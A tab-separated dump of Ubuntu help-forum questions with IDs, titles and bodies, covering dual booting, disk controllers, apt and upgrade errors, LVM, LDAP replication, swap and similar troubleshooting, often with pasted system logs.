501669	can i reinstall ubuntu from an ext hdd image after loading win7 onto the formerly ubuntu laptop , and get a working dual boot system ? if so , how	i want to set up a dual-boot win7 + ubuntu system on a current ubuntu linux dell laptop the windows 7 ultimate disk i have is a dell reinstall only disk , so it will wipe any existing os on the system . can i copy the ubuntu linux setup as an image to an external hdd , then load win7 onto the laptop , then copy the ubuntu image back from the ext hdd , and wind up with a working dual boot system ? if so , are there any specific steps/sequence of steps to follow or specific pitfalls to watch out for ? if there is a better alternate process that has worked for you , i 'm open to trying that instead .
501675	how to detect all 10 disk drives on 2 port multipliers attached to marvell 88se9130 based hba ?	i installed a silverstone ec05 sata hba/raid controller on a ubuntu 14.04 64-bit system , kernel 3.13.0-24-generic . this ec05 pci express card is based on a marvell 88se9130 chip . lspci detects the controller as `` sata controller : marvell technology group ltd. 88se9128 pcie sata 6 gb/s raid controller with hyperduo ( rev 11 ) â . on both its two sata ports sil3726 chip based port multiplier devices are attached . each port multiplier ( pm ) has 5 identical sata drives attached . this makes 10 drives in total connected to the ec05 . each port multiplier is configured to be in port multiplier mode ( not any kind of raid mode ) . the motherboard bios seems to be configured to not load other bios-es because pressing ctrl+m during boot , does n't result in entering into the marvell bios . actual result : when attaching pm # 1 to ec05 sata port # 1 , and pm # 2 to ec05 sata port # 2 , only the 5 drives on pm # 1 are detected by the os . when attaching pm # 1 to ec05 sata port # 2 , and pm # 2 to ec05 sata port # 1 , only the 5 drives on pm # 1 are detected by the os . when attaching pm # 2 to ec05 sata port # 2 , and disconnecting ec05 sata port # 1 , only the 5 drives on pm # 2 are detected by the os . expected result : when attaching pm # 1 to ec05 sata port # 1 , and pm # 2 to ec05 sata port # 2 , all 10 drives are detected by the os . when attaching pm # 1 to ec05 sata port # 2 , and pm # 2 to ec05 sata port # 1 , all 10 drives are detected by the os . related dmesg output section : [ 2.806779 ] ahci 0000:03:00.0 : irq 44 for msi/msi-x [ 2.820401 ] ahci 0000:03:00.0 : ahci 0001.0200 32 slots 8 ports 6 gbps 0xff impl sata mode [ 2.820402 ] ahci 0000:03:00.0 : flags : 64bit ncq pio [ 2.821223 ] scsi5 : ahci [ 2.821290 ] scsi6 : ahci [ 2.821346 ] scsi7 : ahci [ 2.821403 ] scsi8 : ahci [ 2.821458 ] scsi9 : ahci [ 2.821514 ] scsi10 : ahci [ 2.821569 ] scsi11 : ahci [ 2.821625 ] scsi12 : ahci [ 2.821673 ] ata6 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510100 irq 44 [ 2.821675 ] ata7 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510180 irq 44 [ 2.821676 ] ata8 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510200 irq 44 [ 2.821678 ] ata9 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510280 irq 44 [ 2.821679 ] ata10 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510300 irq 44 [ 2.821681 ] ata11 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510380 irq 44 [ 2.821682 ] ata12 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510400 irq 44 [ 2.821684 ] ata13 : sata max udma/133 abar m2048 @ 0xf0510000 port 0xf0510480 irq 44 [ 3.124077 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.148049 ] ata6 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.148069 ] ata11 : sata link down ( sstatus 0 scontrol 300 ) [ 3.148091 ] ata12 : sata link down ( sstatus 0 scontrol 300 ) [ 3.148112 ] ata13 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 3.148132 ] ata8 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.148148 ] ata7 : sata link down ( sstatus 0 scontrol 300 ) [ 3.148170 ] ata9 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.151632 ] ata13.00 : atapi : marvell virtuall , 1.09 , max udma/66 [ 3.181571 ] ata5.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 3.181572 ] ata5.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 3.181573 ] ata5.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 3.184009 ] ata10 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.211495 ] ata8.00 : ata-8 : hitachi hds5c3020ble630 , mz4oaab0 , max udma/133 [ 3.211496 ] ata8.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 3.211501 ] ata6.00 : ata-8 : hitachi hds5c3020ble630 , mz4oaab0 , max udma/133 [ 3.211502 ] ata6.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 3.211508 ] ata13.00 : configured for udma/66 [ 3.211510 ] ata9.00 : ata-8 : hitachi hds5c3020ble630 , mz4oaab0 , max udma/133 [ 3.211511 ] ata9.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 3.269922 ] ata10.00 : ata-8 : hitachi hds5c3020ble630 , mz4oaab0 , max udma/133 [ 3.269923 ] ata10.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 3.269927 ] ata5.00 : ata-7 : ocz-vertex , 1.3 , max udma/133 [ 3.269927 ] ata5.00 : 125045424 sectors , multi 1 : lba48 ncq ( depth 31/32 ) , aa [ 3.329205 ] ata8.00 : configured for udma/133 [ 3.329213 ] ata9.00 : configured for udma/133 [ 3.329217 ] ata6.00 : configured for udma/133 [ 3.358627 ] ata5.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 3.358628 ] ata5.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 3.358629 ] ata5.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 3.387504 ] ata10.00 : configured for udma/133 [ 3.444077 ] ata5.00 : configured for udma/133 [ 3.444146 ] scsi 4:0:0:0 : direct-access ata ocz-vertex 1.3 pq : 0 ansi : 5 [ 3.444326 ] sd 4:0:0:0 : [ sda ] 125045424 512-byte logical blocks : ( 64.0 gb/59.6 gib ) [ 3.444352 ] sd 4:0:0:0 : [ sda ] write protect is off [ 3.444353 ] sd 4:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 3.444361 ] sd 4:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.444539 ] sd 4:0:0:0 : attached scsi generic sg0 type 0 [ 3.444653 ] scsi 5:0:0:0 : direct-access ata hitachi hds5c302 mz4o pq : 0 ansi : 5 [ 3.444732 ] sd 5:0:0:0 : [ sdb ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 3.444733 ] sd 5:0:0:0 : [ sdb ] 4096-byte physical blocks [ 3.444794 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 3.444796 ] sd 5:0:0:0 : [ sdb ] mode sense : 00 3a 00 00 [ 3.444805 ] sd 5:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.444855 ] sd 5:0:0:0 : attached scsi generic sg1 type 0 [ 3.444919 ] scsi 7:0:0:0 : direct-access ata hitachi hds5c302 mz4o pq : 0 ansi : 5 [ 3.444990 ] sd 7:0:0:0 : [ sdc ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 3.444990 ] sd 7:0:0:0 : [ sdc ] 4096-byte physical blocks [ 3.445011 ] sd 7:0:0:0 : [ sdc ] write protect is off [ 3.445012 ] sd 7:0:0:0 : [ sdc ] mode sense : 00 3a 00 00 [ 3.445021 ] sd 7:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.445114 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 3.445173 ] scsi 8:0:0:0 : direct-access ata hitachi hds5c302 mz4o pq : 0 ansi : 5 [ 3.445233 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 3.445287 ] scsi 9:0:0:0 : direct-access ata hitachi hds5c302 mz4o pq : 0 ansi : 5 [ 3.445348 ] sd 9:0:0:0 : attached scsi generic sg4 type 0 [ 3.445407 ] sd 8:0:0:0 : [ sdd ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 3.445408 ] sd 8:0:0:0 : [ sdd ] 4096-byte physical blocks [ 3.445414 ] sd 9:0:0:0 : [ sde ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 3.445415 ] sd 9:0:0:0 : [ sde ] 4096-byte physical blocks [ 3.445854 ] sd 9:0:0:0 : [ sde ] write protect is off [ 3.445856 ] sd 9:0:0:0 : [ sde ] mode sense : 00 3a 00 00 [ 3.445865 ] sd 8:0:0:0 : [ sdd ] write protect is off [ 3.445866 ] sd 8:0:0:0 : [ sdd ] mode sense : 00 3a 00 00 [ 3.445888 ] sd 9:0:0:0 : [ sde ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.445916 ] sd 8:0:0:0 : [ sdd ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.499601 ] scsi 12:0:0:0 : processor marvell 91xx config 1.01 pq : 0 ansi : 5 [ 3.499673 ] scsi 12:0:0:0 : attached scsi generic sg5 type 3 [ 3.553712 ] sda : sda1 sda2 < sda5 > [ 3.553904 ] sd 4:0:0:0 : [ sda ] attached scsi disk [ 3.660336 ] sdc : unknown partition table [ 3.660369 ] sdb : unknown partition table [ 3.660442 ] sd 7:0:0:0 : [ sdc ] attached scsi disk [ 3.660475 ] sdd : unknown partition table [ 3.660510 ] sd 5:0:0:0 : [ sdb ] attached scsi disk [ 3.660545 ] sd 8:0:0:0 : [ sdd ] attached scsi disk [ 3.712498 ] sde : unknown partition table [ 3.712578 ] sd 9:0:0:0 : [ sde ] attached scsi disk [ 4.102853 ] random : nonblocking pool is initialized [ 4.985641 ] ata11 : exception emask 0x10 sact 0x0 serr 0x4000000 action 0xe frozen [ 4.985642 ] ata11 : irq_stat 0x80000040 , connection status changed [ 4.985643 ] ata11 : serror : { devexch } [ 4.985647 ] ata11 : hard resetting link [ 5.705533 ] ata11 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 5.794270 ] ata11.00 : ata-8 : hitachi hds5c3020ble630 , mz4oaab0 , max udma/133 [ 5.794271 ] ata11.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 5.884054 ] ata11.00 : configured for udma/133 [ 5.913642 ] ata11 : eh complete [ 5.942886 ] scsi 10:0:0:0 : direct-access ata hitachi hds5c302 mz4o pq : 0 ansi : 5 [ 5.972831 ] sd 10:0:0:0 : [ sdf ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 5.972832 ] sd 10:0:0:0 : [ sdf ] 4096-byte physical blocks [ 5.972854 ] sd 10:0:0:0 : [ sdf ] write protect is off [ 5.972855 ] sd 10:0:0:0 : [ sdf ] mode sense : 00 3a 00 00 [ 5.972865 ] sd 10:0:0:0 : [ sdf ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 5.973000 ] sd 10:0:0:0 : attached scsi generic sg6 type 0 [ 6.064214 ] sdf : unknown partition table [ 6.064301 ] sd 10:0:0:0 : [ sdf ] attached scsi disk i ca n't find a utility to erase the marvell 91xx bios in the hope that the raid functionality is lost , and that the controller will act as a plain host bus adapter ( hba ) only . how to detect all 10 drives , when connecting them via 2 sil3726 port multipliers to both ec05 sata ports ?
501676	how do i make the suspend option appear in 14.04 with cinnamon 2.2	i recently upgraded from ubuntu 13.10 with cinnamon 2 to ubuntu 14.04 with cinnamon 2.2 i no longer have the option to suspend from the shutdown menu . closing the lid will not suspend the system either ( i have this setup to suspend when on battery ) . i have mate on the same system and if i login to a mate session suspend is available and closing the lid suspends .
501678	tasksel error in 14.04 preseed	i have a 14.04 preseed that errors and bails out with this being reported to syslog : jul 23 17:54:12 pkgsel : starting tasksel jul 23 17:54:13 in-target : unknown option : debconf-apt-from jul 23 17:54:13 in-target : unknown option : debconf-apt-to jul 23 17:54:13 in-target : usage : jul 23 17:54:13 in-target : tasksel install < task > ... jul 23 17:54:13 in-target : tasksel remove < task > ... jul 23 17:54:13 in-target : tasksel [ options ] jul 23 17:54:13 in-target : -t , -- test test mode ; do n't really do anything jul 23 17:54:13 in-target : -- new-install automatically install some tasks jul 23 17:54:13 in-target : -- list-tasks list tasks that would be displayed and exit jul 23 17:54:13 in-target : -- task-packages list available packages in a task jul 23 17:54:13 in-target : -- task-desc returns the description of a task jul 23 17:54:13 main-menu [ 220 ] : warning ** : configuring 'pkgsel ' failed with error code 1 jul 23 17:54:13 main-menu [ 220 ] : warning ** : menu item 'pkgsel ' failed . jul 23 17:54:16 main-menu [ 220 ] : info : modifying debconf priority limit from 'high ' to 'medium' jul 23 17:54:16 debconf : setting debconf/priority to medium jul 23 17:54:21 main-menu [ 220 ] : info : menu item 'save-logs ' selected i 've been able to reproduce the error on my local machine by doing this : [ user @ pc : ~ ] tasksel -- debconf-apt-to unknown option : debconf-apt-to usage : tasksel install < task > ... tasksel remove < task > ... tasksel [ options ] -t , -- test test mode ; do n't really do anything -- new-install automatically install some tasks -- list-tasks list tasks that would be displayed and exit -- task-packages list available packages in a task -- task-desc returns the description of a task i 'm not sure where the preseed is giving this information , since the only time tasksel is initiated is right before pkgsel , here : tasksel tasksel/first multiselect standard watching the installer , it gets to popcon then gives me that error . the only thing in the preseed that is after the popcon option is the boot loader stuff . i 'm thoroughly confused and would appreciate any help ! thanks
501681	apt-get update tries to download uncompressed packages file	i am using a physical server right now . i have installed maas and can not use the apt-get function at all . when i type sudo apt-get update i get a long string with some things updating and most things returning an error ( output for this command at bottom of question ) . if i type apt-get install [ any package at all ] i get something like this : reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim ' has no installation candidate ifconfig returns all the correct information , eth0 is up and running , i can ping any website i like , i can connect over ssh , i can even access the server from my browser on another computer but apt wo n't work for anything . i have tried to reinstall three times with different boot disks and one of those times i even tried using the standard ubuntu server and wound up with the exact same problem . also apt is working fine on other computers on the network . stackoverflow wo n't let me print out the output for update without 10 reputation and it 's too long for a comment so here is the last part of it ( the rest is just err [ link ] packages ) . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/binary-i386/packages httperror404 w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/binary-i386/packages httperror404 e : some index files failed to download . they have been ignored , or old ones used instead .
501682	i built a library from source and the libs are in ~/desktop/xerces -- how do i install these libs so the linker can find them ?	i have a bunch of .so libs in ~/desktop/xerces after building the library from source . i would now like to install these libraries ( say in /usr/lib ) and have them picked up by ld . i manually copied the libs into /usr/lib with sudo mv but it did not work ( and i think that 's the bad-style way to do it anyway ) .
501685	error : elf header smaller than expected	i had a power cut in the house and when i turned on my notebook again this error came up . how can i fix it ? i searched already but nothing has helped ( i 'm probably doing something wrong ) . i looked the solutions in this website but again but both solutions with live cd and without it did n't worked . the thing that did the most was the live cd but it sent an error while reparing .
501686	two `` ubuntu-vg '' partitions unable to mount due to naming clash	i had ubuntu 13.04 installed on my laptop . rather than upgrading , i decided to install 14.04 fresh on a new ssd . so , i have two drives . one with 13.04 and my old data , and one with 14.04 . both ubuntu instances were installed using the default `` erase disk and install ubuntu '' option with lvm checked . i 'm trying to mount my old drive , now , to migrate data over . however , the name for the name for the lvm partition is the same and thus not allowing it to appear . how can i get around this ? can i rename it ? some diagnostics ... root @ computer : / # fdisk -lu disk /dev/sda : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00087708 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 468860927 234179585 5 extended /dev/sda5 501760 468860927 234179584 8e linux lvm disk /dev/mapper/ubuntu -- vg-root : 222.7 gb , 222746902528 bytes 255 heads , 63 sectors/track , 27080 cylinders , total 435052544 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 17.0 gb , 17049845760 bytes 255 heads , 63 sectors/track , 2072 cylinders , total 33300480 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000903b4 device boot start end blocks id system /dev/sdb1 * 2048 499711 248832 83 linux /dev/sdb2 501758 976771071 488134657 5 extended partition 2 does not start on physical sector boundary . /dev/sdb5 501760 976771071 488134656 8e linux lvm root @ computer : / # pvscan pv /dev/sdb5 vg ubuntu-vg lvm2 [ 465.52 gib / 48.00 mib free ] pv /dev/sda5 vg ubuntu-vg lvm2 [ 223.33 gib / 0 free ] total : 2 [ 688.85 gib ] / in use : 2 [ 688.85 gib ] / in no vg : 0 [ 0 ] root @ computer : / # vgscan reading all physical volumes . this may take a while ... found volume group `` ubuntu-vg '' using metadata type lvm2 found volume group `` ubuntu-vg '' using metadata type lvm2 root @ computer : / # lvscan inactive '/dev/ubuntu-vg/root ' [ 449.60 gib ] inherit inactive '/dev/ubuntu-vg/swap_1 ' [ 15.88 gib ] inherit
501687	upgrade problem- insufficient room	i 'm attempting to upgrade from 13.10 to 14.04 . upgrade aborts with message `` not enough room on /boot . empty trash and 'sudo apt-get clean ' . i have done so , and still get the same message , and same abort .
501688	openldap modify config for replication problem	i have two servers , a master and a slave . i am trying to get them to replicate over tls . i have followed everything in this guide but when i attempt to run the sudo ldapmodify -y external -h ldapi : /// -f consumer_sync_tls.ldif command i get the following error : modifying entry `` olcdatabase= { 1 } hdb , cn=config '' ldap_modify : other ( e.g. , implementation specific ) error ( 80 ) additional info : error : parse_syncrepl_line : unable to parse `` bindmethod=simplebinddn=cn=admin , dc=master , dc=com '' here is a copy of my .ldif dn : olcdatabase= { 1 } hdb , cn=config replace : olcsyncrepl olcsyncrepl : rid=001 provider=ldap : //master:389 bindmethod=simple binddn= '' cn=admin , dc=master , dc=com '' credentials=123456 searchbase= '' dc=master , dc=com '' logbase= '' cn=accesslog '' logfilter= '' ( & ( objectclass=auditwriteobject ) ( reqresult=0 ) ) '' schemachecking=on type=refreshandpersist retry= '' 60 + '' syncdata=accesslog starttls=critical tls_reqcert=demand any help will be greatly appreciated !
501695	file ownership changes when uploading files to a apache server using webdav	i have a webdav share set up on a server at my house . when accessing this server with my authenticated username from my iphone webdav client and uploading files , the files are owned by www-data : www-data which is what i expect , since that 's the user that runs apache . however when i access the share with my laptop ( running ubuntu gnome ) through the nautilus file browser , the files i create end up with my username and group for my laptop 's user ( mordecai : mordecai ) which does n't make sense to me , since i 'm using the same protocol and user-password credentials on both systems . this causes problems because i ca n't alter files that i upload with one device with the other device . i want to be able to upload things while i 'm out and about , and be able to rsync my laptop when i 'm working , and then be able to open the files from my phone later , and this is preventing that .
501698	after reboot swap turns off issue	i am using ubuntu 14.04lts . i have a problem with my swap partition . i resized swap with gparted . when partitioning , i had to turn swap partition off . after resizing it , i put it back to active ( on ) state . when i rebooted my laptop , the swap partition is off . i have to turn it on after every reboot . how can i permanently enable swap ?
501699	conky does not show cpu temp	i am trying to use conky to minitor my system but it is not showing cpu temperature , lm-sensors , hddtemp are installed , i answered yes to all questions running sensors-detect and at the end it shows : '' monitoring programs wo n't work until the needed modules are loaded . you may want to run '/etc/init.d/kmod start' to load them . '' i loaded the modules name : /etc/init.d/kmod start [ info ] loading kernel module loop . [ info ] loading kernel module w83627ehf . [ info ] loading kernel module w83627ehf . and running sensors shows : sensors k10temp-pci-00c3 adapter : pci adapter temp1 : +22.0°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +67.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 48.00 w ( crit = 115.11 w ) k10temp-pci-00cb adapter : pci adapter temp1 : +22.1°c ( high = +70.0°c ) k10temp-pci-00d3 adapter : pci adapter temp1 : +17.2°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +67.0°c ) fam15h_power-pci-00d4 adapter : pci adapter power1 : 42.78 w ( crit = 115.11 w ) k10temp-pci-00db adapter : pci adapter temp1 : +17.1°c ( high = +70.0°c ) w83627dhg-isa-0290 adapter : isa adapter vcore : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in1 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm avcc : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm +3.3v : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm in4 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in5 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in6 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm 3vsb : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm vbat : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm fan1 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan2 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan3 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan4 : 0 rpm ( min = 0 rpm , div = 128 ) alarm temp1 : -1.0°c ( high = -1.0°c , hyst = -1.0°c ) alarm sensor = cpu diode temp2 : +0.0°c ( high = +0.0°c , hyst = +0.0°c ) alarm sensor = cpu diode temp3 : +0.0°c ( high = +0.0°c , hyst = +0.0°c ) alarm sensor = cpu diode cpu0_vid : +0.000 v intrusion0 : alarm then i look for the modules by module-assisstant as root and it could not find any of them . what should i do to have the cpu temp on conky ? thanks in advance .
501700	upgrade to 14.04 broken : python error : nameerror : name 'magic ' is not defined	my release upgrade is broken , shows following error related to python : http : //www.pasteall.org/53013 my all python versions are : python python2.7 python3.3 python3m python2 python3 python3.3m i run 13.10 64bit , what else could i raport ? i look into ./sre_constants.py : try : from _sre import maxrepeat except importerror : import _sre _sre.maxrepeat = 65535 and also into ./sre_compile.py : '' internal support module for sre '' import _sre , sys import sre_parse from sre_constants import * from _sre import maxrepeat assert _sre.magic == magic , `` sre module mismatch '' i have million of broken packages which are not visible in synaptic ( broken filter ) : http : //www.pasteall.org/53015
501701	installing freebasic-0.90.1 in ubuntu	i have been using fb under winxp , and am trying to install it under ubuntu14 . it is not available in the ubuntu repository ( why ? ? ? ) , so i download the binary package from the fb website and uncompressed it successfully . it includes a shell installer ( install.sh ) , but i have been unable to get it to work despite making the changes suggested in the shell comment lines . does anyone know how to get the shell installer to work under ubuntu ? ? ( i am a novice ubuntu user ... ... ... )
501702	lightdm failed to start session ; user folder requesting gnome	we 're migrating some old 10.10 users on gnome to 14.04 using unity . when they log on , however , the lightdm greeter complains `` failed to start session . '' /var/log/lightdm/lightdm.log notes : [ +181.14s ] debug : session pid=3566 : user thales authorized [ +181.15s ] debug : session pid=3566 : greeter requests default session [ +181.15s ] debug : seat : failed to find session configuration gnome-classic [ +181.15s ] debug : seat : ca n't find session 'gnome-classic' [ +181.15s ] debug : session pid=3566 : greeter start authentication a successful login looks like : [ +113.16s ] debug : session pid=1957 : user ntimkovich authorized [ +113.17s ] debug : session pid=1957 : greeter requests default session [ +113.17s ] debug : seat : stopping greeter ; display server will be re-used for user session [ +113.17s ] debug : session pid=1957 : sending sigterm ... our migration is in an intermediate state , so i 'd like to avoid obliterating profiles ( e.g . rm -rf ~/.gnome* ) , and we 're also trying to push people to just use one desktop ( the stock unity ) for simplicity . what is the specific folder/file that is causing the gui to request 'gnome-classic ' that i could perhaps temporarily hide ? or even better , is there a way to tell lightdm ( or whatever does this ) that if it `` ca n't find session 'x ' '' to revert to unity ?
501704	ubuntu not able to find windows 8.1 during installation	how to install ubuntu 14.04 alongside windows 8.1 . because it does not show option for installing ubuntu alongside windows .
501707	how to prevent go to dpkg-reconfigure mode during installing	is there any switch which tell apt-get command not to go to dpkg-reconfigure mode during ? i mean , we go to configure mode after installation ?
501709	adding contrib non-free in ubuntu repository for installing flash plugins	i installed ubuntu 14.04 and i have problem of plugins in my browser ... i know if i add contrib non-free at the end of each repository in debian and then do : update-flashplugin-nonfree -- install the problem would be fixed . but what is the solution in ubuntu ? i also did : update-flashplugin-nonfree -- install sudo update-pepperflashplugin-nonfree -- install but not worked . what should i do ?
501715	software to block specific internet web pages	i am looking to download some software on an old laptop that runs the ubuntu operating system on it . the software that i am interested in is something that will allow me to block specific internet web pages . does anyone know of any such software for the ubuntu system ?
501717	i have ubuntu 14.04 and unity tweak tool isnt working .	i have reinstalled it and its not showing up anywhere . when i search for it in the applications finder , it says its there , but when i click it , nothing pops up , and it messes up docky . any tips ?
501722	what is ubuntu 14.04 doing while showing `` stopping early crypto disks '' ?	i created a virtual machine to install ubuntu 14.04 on virtualbox 4.2.12.* . i created virtual cd to install it with fixed-size virtual disk of 200gb . after successful installation , it restarted as usual . but after showing message of below , it hangs . actually , i created virtual machines to install ubuntu at virtual box successfully several times . it 's very easy . the installed ubuntu versions ranged from 9.10 , 13.04 and even 14.04 before . i do n't know why this time it hangs at restarting after successful installation . the only difference between this failure restart and previous successful ones is that the virtual disk is much larger , 200gb . it failed three times . * deactivating swap ... [ ok ] * stopping remaining crypto disks ... [ ok ] * stopping early drypto disks ... [ ok ]
501723	ubuntu genymotion unable to start and get segmentation fault	after downloading genymotion package and running this command on ubuntu 14.04 for starting package , i get this error : error : segmentation fault ( core dumped ) commands to start : sudo apt-get install libxi-dev libxmu-dev mkdir qtlibs & & mv *qt*.so* qtlibs ulimit -c unlimited ulimit -c unlimited command successfully created core file with 46m of space , but genymotion still could not start .
501728	lost graphical login after automating script command	i 'm running ubuntu 12.04 lts and i want to log all input/output from users . i 've simply tried adding script -a -f /log_files/log_file.txt to users ~/.profile . the logging works just fine , but graphical login simply boots the user back to login screen . the terminal login is fine and this is not a problem with ownership of ~/.xauthority . alternatively , launching the script as an upstart job ( at various start on timings and owned by root ) indicates that it is running ( script started , file is /log_files/log_file.txt ) . however , it does n't actually write to the log file and the graphical login is fine . does the script command take ownership of the shell that prevents graphical login ?
501732	how to stream videos over local network to tv from pc	i have quite a bit of hardware already ( a wii u , an xbox 360 , a chromecast , a raspberry pi etc ) but i still ca n't find a good way to watch the videos saved on my ubuntu computer , on my tv downstairs . is this possible ? do i need to buy something else to play them ? i thought the chromecast was going to be the answer but i ca n't find any working software .
501734	ubuntu 12.04 lts stops at start	i 've installed the updates , and at the end it asked me to restart the computer . after i restarted , it stops at the booting . all i see is : black screen , ubuntu 12.04 and the four dots in the middle of the screen . the first dot is orange , and after the fourth dot there 's the cursor line .
501738	how to satisfy the dependency xsltproc , in order to install drivers for epson l 210 scanner	i 've spent a lot of time trying to make work my multi-function epson l 210 . i can print , but i ca n't scan , not with xsane , nor gscan2pdf , nor simple scan , etc . i 've tryied to install iscan-data ( in order to install iscan afterward ) with the software center , or gdebi , but i receive an error message : ca n't satisfy the dependency xsltproc . what can i do to fix the problem ? i 'll be grateful to anyone can help me , thanks .
501743	install ubuntu on galaxy pro	i would like to install ubuntu on my samsung galaxy note pro ( sm-p900 ) . there is any tutorial available ?
501744	3g modem signal strength	i 'm soon going to install a 3g modem ( huawei b932 ) with an external antenna on our summer place . when choosing what direction the antenna should be directed it would be very useful to get some sort of measure for the signal strength for each direction . the modem it self just gives 3 levels with different led colors , and i suspect that is not enough for me . i found many questions about getting the signal strength for a usb stick modem , but how about a real modem that is connected to the laptop through an ethernet cabel . i tried ixconn , but could not get it working . it just says `` modem not responding '' . i 'm using 12.04
501746	i need help solving upgrade problem , `` fetching upgrade failed , '' 12.04 to 12.10	i am using xfce4 on an acer c70 chromebook . i managed to successfully update my system to 14.04 about a month ago using update manager , but was left with many unresolved bugs that i could not work around . so , defeated , i decided to reset everything and do a fresh install . on attempting to update 12.04 to 12.10 , i get errors in both update manager and terminal indicating a `` failure to fetch '' due to network problems . i have gone through an exhaustive list of help pages trying to solve this problem , but thus far either none are pertinent to my specific problem or i am unable to understand how to accomplish the steps involved . i am able to `` apt-get update , '' and `` apt-get upgrade , '' but `` do-release-upgrade '' yields the following : checking for a new ubuntu release err upgrade tool signature 404 not found [ ip : 91.189.91.14 80 ] err upgrade tool 404 not found [ ip : 91.189.91.14 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'quantal.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem .
